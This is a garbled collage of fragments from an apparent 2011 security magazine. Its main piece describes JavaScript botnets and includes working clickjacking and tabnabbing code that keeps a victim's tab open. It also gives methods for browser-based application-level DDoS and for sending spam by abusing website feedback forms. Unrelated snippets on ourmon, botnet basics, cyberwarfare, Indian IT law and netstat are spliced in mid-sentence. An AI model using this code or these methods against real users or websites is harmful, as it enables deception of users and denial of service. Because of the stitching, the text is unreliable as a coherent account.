fast over the recent years. Moreover, HTML5 introduces WebWorkers, a threading model for JavaScript. This lets any website start a background JavaScript thread, unknown to the user, and execute code without slowing the page down or making the browser unresponsive.

Creating a JavaScript Botnet:
A JavaScript botnet would consist of thousands of systems that have the attacker-controlled page open in their browsers for an extended duration, allowing continued execution of the attacker's JavaScript. There are two phases in building such a botnet:
1) Reaching out to victims
2) Extending execution lifetime

1) Reaching out to victims:
This involves getting the victim to visit an attacker-controlled website. This can be done in a number of different ways:
1) Email spam
2) Trending topics on Twitter
3) Persistent XSS on popular websites, forums etc.
4) Search Engine Poisoning
5) Compromised websites
6) Abusing URL shorteners

These are the methods current JavaScript malware authors use to draw victims to their websites, and they can bring in thousands of victims. While a traditional malware-spreading website can be quickly identified by automated crawlers looking for signatures of browser exploits, JavaScript botnet payloads are less likely to be identified: they are regular JavaScript working within the constraints of the sandbox and do not perform any exploitation against the browser.

2) Extending execution lifetime:
Once a victim visits the attacker-controlled page, it is essential to keep this page open in the victim's browser for as long as possible. This can be done by combining Clickjacking and Tabnabbing.
When the page is loaded, it contains an invisible link with the target attribute set to '_blank'. This link is kept under the mouse pointer at all times using the 'document.onmousemove' event handler. This way, when the victim clicks anywhere on the page, a new tab opens and grabs the victim's attention. With multiple tabs open, the likelihood of the victim coming back to the main tab and closing it is reduced.
To add to this effect, Tabnabbing can be used to refresh the page after the user leaves it, updating the favicon and appearance to resemble popular websites like YouTube, Google or Facebook so that the page blends in with the other tabs the victim would usually have open. There is a working demo of this on the Attack and Defense Labs website [http://www.andlabs.org/hacks/xtend_life.html].

JavaScript botnet activities:
JavaScript botnets can be used to perform the same activities as traditional botnets. This article discusses three such activities:
1) Application-level DDoS attacks
2) Email spam
3) Distributed password cracking

1) Application-level DDoS attacks
DDoS attacks have been all over the news recently as activists on either side of the Wikileaks debate took out each other's websites. Firms like Mastercard and Visa have suffered significant losses due to this.
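Returning to the "Extending execution lifetime" phase above, here is the core of the two tricks as an added example. It is not the article's code and not the andlabs demo: the clickjacking half (an invisible target=_blank link that follows the pointer) and the tabnabbing half (title and favicon swapped once the tab is hidden) are written as functions over a `doc` object, which is `document` in a browser, so the logic can be exercised without a DOM. The disguise profiles, the favicon URLs and the decoy href are made-up placeholders, and `looksLikeDecoyLink` is a simple heuristic, added here, of the kind a scanner or browser extension could use to flag such a link.

```javascript
'use strict';
// Added example, not the article's code nor the andlabs demo. Pure functions over a
// `doc` object (document in a browser) so they can be unit-tested without a DOM.
// Disguise profiles, favicon URLs and the decoy href are made-up placeholders.

const LINK_SIZE = 20; // px: small enough to stay unnoticed, large enough to catch a click

// Placeholder profiles the tab disguises itself as after the user looks away.
const DISGUISES = {
  youtube:  { title: 'YouTube',  favicon: 'https://example.invalid/yt.ico' },
  google:   { title: 'Google',   favicon: 'https://example.invalid/g.ico' },
  facebook: { title: 'Facebook', favicon: 'https://example.invalid/fb.ico' },
};

// Clickjacking half: an invisible target=_blank link that will follow the pointer,
// so any click opens a new tab while the original page stays open behind it.
function createDecoyLink(doc, href) {
  const a = doc.createElement('a');
  a.href = href;
  a.target = '_blank';
  Object.assign(a.style, {
    position: 'fixed', display: 'block', opacity: '0',
    width: `${LINK_SIZE}px`, height: `${LINK_SIZE}px`, zIndex: '2147483647',
  });
  doc.body.appendChild(a);
  return a;
}

// Centre the decoy under the pointer on every mousemove.
function followPointer(link, evt) {
  link.style.left = `${evt.clientX - LINK_SIZE / 2}px`;
  link.style.top = `${evt.clientY - LINK_SIZE / 2}px`;
  return { left: link.style.left, top: link.style.top };
}

// Tabnabbing half: once the tab is hidden, swap title and favicon for the disguise.
function applyDisguise(doc, name) {
  const d = DISGUISES[name];
  if (!d) throw new Error(`unknown disguise: ${name}`);
  doc.title = d.title;
  let icon = doc.querySelector('link[rel~="icon"]');
  if (!icon) {
    icon = doc.createElement('link');
    icon.rel = 'icon';
    doc.head.appendChild(icon);
  }
  icon.href = d.favicon;
  return { title: doc.title, favicon: icon.href };
}

// Wire both halves up; returns the decoy so callers (and tests) can inspect it.
function armTabRetention(doc, decoyHref, disguise) {
  const link = createDecoyLink(doc, decoyHref);
  doc.addEventListener('mousemove', (evt) => followPointer(link, evt));
  doc.addEventListener('visibilitychange', () => {
    if (doc.hidden) applyDisguise(doc, disguise); // user has moved to another tab
  });
  return link;
}

// Defender's side: the decoy has a recognisable shape that a scanner or browser
// extension can flag, i.e. a fixed, fully transparent, new-tab link with no visible text.
function looksLikeDecoyLink(a) {
  const s = a.style || {};
  return a.target === '_blank'
    && s.position === 'fixed'
    && parseFloat(s.opacity) === 0
    && !(a.textContent && a.textContent.trim());
}

// In a page, after the DOM has loaded:
// armTabRetention(document, 'https://example.invalid/decoy', 'google');
```

The `visibilitychange` event is used here in place of the periodic refresh the article mentions; either way the point is that the disguise is applied only once the victim is looking elsewhere, so the change is never seen happening.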
Issue 12 – Jan 2011 | Page - 5
Application-level DDoS is an effective type of DDoS attack that has affected even sites like Twitter. These attacks usually involve a large number of HTTP requests to specific sections of the website that are potentially resource-intensive for the server to process.
Background JavaScript threads started with WebWorkers can send cross-domain XMLHttpRequests even when the remote website does not support Cross Origin Requests. The Cross Origin Request security restriction applies only to reading the response: the browser still sends the request, and a website that does not support Cross Origin Requests still processes it, so the load on the server is created either way.
A simple request like http://www.target.site/search_product.php?product_id=% (the '%' presumably meant as a wildcard that makes the search as expensive as possible), when sent in large numbers, can cause severe performance issues on the server.
A browser can send a surprisingly large number of GET requests to a remote website using COR from WebWorkers. During tests it was found that around 10,000 requests/minute can be sent from a single browser. Even a very small botnet of just 600 zombies would therefore send around 100,000 requests/sec; depending on the nature of the page being requested, this could be enough to bring a website down.
After I wrote about DDoS attacks with COR, a very smart person [http://shellex.info] showed me that similar numbers could also be achieved by using the img tag to request remote resources. Ben Schmidt has gone one step further by creating a malicious URL shortening service called d0z.me [http://d0z.me/]. d0z.me appears to work like any other URL shortening service, but it actually shows the destination page in an iframe while performing a DoS attack on a target website from the victim's browser. It does this so well that it is extremely unlikely that the user will even sense that he is part of a DDoS attack.

2) Email Spam
Spam mails are largely sent using open-relay mail servers and botnet zombies. Though it is not possible to talk to a regular open-relay mail server from JavaScript, it is still possible to send spam through the web equivalent of an open relay.
Many websites have feedback sections which ask the user to enter their name, email ID, subject and feedback. Once these are entered and the form is submitted, the server crafts an email from them, with hard-coded from and to addresses, and sends it to the internal mail server.
Poorly designed websites keep the from and to addresses in hidden form fields in the browser. By overwriting them with external addresses it should be possible to send mail with spoofed addresses, provided the company's mail server is also configured to operate as an open relay.
Cross-origin requests from a worker are sent without any preflight as long as they are 'simple' requests: GETs, and also POSTs with a form content type (application/x-www-form-urlencoded); only the response is withheld from the script. So the feedback form can often be submitted directly. Where only a GET is practical, the handler must either take all its data from the query string or not distinguish between query-string and POST parameters. Alternatively, if it is a JSP page, HTTP Parameter Pollution can be used to submit the form over GET.

3) Distributed password cracking
Password cracking has always been a task for programs written in native code, with performance-critical sections written in Assembly. With its relatively slow execution rate, JavaScript has never been considered for such resource-intensive tasks.
Things, however, have changed: JavaScript engines in modern browsers are becoming
[root@localhost mrourmon]# cd bin/
[root@localhost bin]# ls
batchipall.sh    batchip.sh
daily.pl         irc.pl
logbackup.pl     makebar.pl
mklogdir.sh      monbackup.pl
ombatchip.pl     ombatchipsrc.pl
ombatchsyn.pl    omupdate.pl
omupdate.sh      ourmon
ourmon.sh        sshdb.pl
ssh.pl           tcpworm.pl
udpreport.pl     wormtolog.pl
[root@localhost bin]#
----------------------------------------------------
DNS RRDs: [graph not reproduced]

UDP Summarizations: [graph not reproduced]
Documentation
1. http://sourceforge.net/projects/ourmon/
2. http://ourmon.sourceforge.net/
So what exactly are Botnets?
A bot can be a single system infected with malicious software/code, and a collection of bots forms a botnet, which is controlled by the commands of the botnet controller.
The above description contains some specific terminology which needs to be understood in order to understand the working of botnets.
A botnet starts with malicious code written by the attacker. The attacker infects a single system/server with the code. This in turn is used by the attacker as the Command and Control (C&C) center for further infection. The attacker here is often termed the "Botmaster".
The Botmaster tries to install the malicious code on users' systems by luring them to access/download a fake file. Once a system is infected with the code, it tries to infect other systems connected to it. The infected systems are known as "Zombies". Thus the infection spreads exponentially through computer systems and an army of zombies is created.
All the Zombies are connected to the attacker through the Command and Control center (C&C). Using it, the attacker can send any command to all systems to which a connection has been established. All this happens with absolutely no knowledge on the part of the user.
Most of the systems which fall prey to botnets are unpatched systems. Attackers try to exploit known vulnerabilities of a system. A specific botnet can be designed to exploit a specific vulnerability; in such cases the attacker only changes the malware it drops onto victims' systems. These kinds of botnets have the same basic architecture and hence are variants of their predecessors.
Now attackers are even trying to hide inside a system using rootkit technology. Rootkits are the most stealthy and hardest-to-detect malware, and attackers have been incorporating this kind of technology to avoid detection.

With all its strategies, techniques and its spread, what does a botnet do?

File Delivery:
By now it is quite clear that every botnet involves some kind of malware which is deployed onto the victim machine. When a system has been compromised, the attacker acquires sufficient rights and sends/downloads malware to the victim machine. The attacker may use utilities provided by the IRC server for download/upload purposes. The attacker may also use the HTTP/FTP protocols to send/receive files, depending upon the system's vulnerabilities.

All work and no play makes jack a dull boy –
Typically botnets evolved as a way to demonstrate the programming skills of their creators. But with technological advances, botnets are now a lethal weapon for cyber criminals and hackers. Botnets are now used for:
- DDoS
- Spamming
- Phishing
- Financial Frauds
- Identity Theft
- Cheating in online games/polls
- Click Frauds
- Espionage
And of course,
for hacking resources to be hired, with very specific goals.
2005 saw the first official claims of attacks pointing to China as their source, and brought up the very big issue of the Source of the Attack, or Attack Source Attribution, which is still unresolved today.
Finally, from 2008 up to now we have started becoming aware of National Critical Infrastructures (NCIs) and of the issues in trying to secure them, summed up in their deep link with SCADA and Industrial Automation (IA) security.
Today's trends see IAs and MoDs deeply scouting hackers' environments and the underground, hiring specialized know-how for mission-oriented capabilities, such as a 0-day e-arsenal, launching cyber attacks and protecting National Security, rather than relying on the industry and on the underground and public communities in order to analyze malware and obtain early
"In the very near future, many conflicts will not take place on the open field of battle, but rather in spaces on the Internet, fought with the aid of information soldiers... This means that a small force of hackers is stronger than the multi-thousand force of the current armed forces."

Nowadays many States have already begun, through their Ministries of Defence, to work on topics such as an official Cyber Doctrine, cyberwarfare training, cyberwarfare exercises and simulations, building an IT roadmap (from a military and National Security point of view), working as well with the IT industry and technical universities (see Malaysia, China and many others), establishing Information Warfare units and, obviously, starting to keep records of hacking activities on other Nations.
It is not a futuristic scenario; here we are talking about something that already happened a long time ago. It was in the middle of the 80's when CCC members Hagbard and Pengo used to hack into Government and Military contractors, as well as centers and research labs, in the USA, handing the results of their hacks to the KGB and receiving money and facilities from them. Hagbard was found dead, hanged from a tree outside the town he was living in, and burned.
Vodafone's Head of Network Design, possibly involved in the 2005 Vodafone Greece affair, was found dead in an apparent suicide. The same happened to Adamo Bove, who worked on Telecom Italia's Lawful Interception System. And the same recently happened to Majid Shahriari in Iran, and everything seems to be related to the Stuxnet worm (http://www.debka.com/article/20406/).
Introduction
A botnet (a contraction of the term "RoBOT NETwork") is a computer network made up of a vast number of compromised computers that have been infected with malicious code and can be remotely controlled through commands sent via the Internet. Typically, users whose computers have been conscripted into a botnet are unaware that their computers have been compromised. The computer so affected is called a "Zombie".

Sec. 43
If any person without permission of the owner or any other person who is incharge of a computer, computer system or computer network,—
(c) Introduces or causes to be introduced any computer contaminant or computer virus into any computer, computer system or computer network;
He shall be liable to pay damages by the way of compensation to the person so affected;

Sec. 66
C:\> wmic process where processid="pid" list full

This will tell you the process with your chosen PID.
You may also try other switches of netstat, like
-b = display the executable name responsible for the connection
-p = specific protocol
-o = display the process ID
-a = display all
But the most interesting thing you'll find is running netstat continuously to keep looking at the results.

Linux
For Linux, more or less all the parameters are the same. You may want to try the same command on Linux too. Remember that it is the parameters of netstat that are the same, not those of the other executables. (Two differences worth knowing: Linux netstat has no -b switch, and -p there shows the owning PID and program name rather than selecting a protocol.)
For example, the first example on Linux will become

Aah! I hate and love the case sensitivity of the Linux environment. That's why we use -i to ignore case while searching, and use only "listen" in the filter, as it may differ among the various Linux flavors.
I know Linux users are geeks themselves, so this article was just a reminder: don't forget your friend netstat, keep using it.

Rohit Srivastwa
rohit@clubhack.com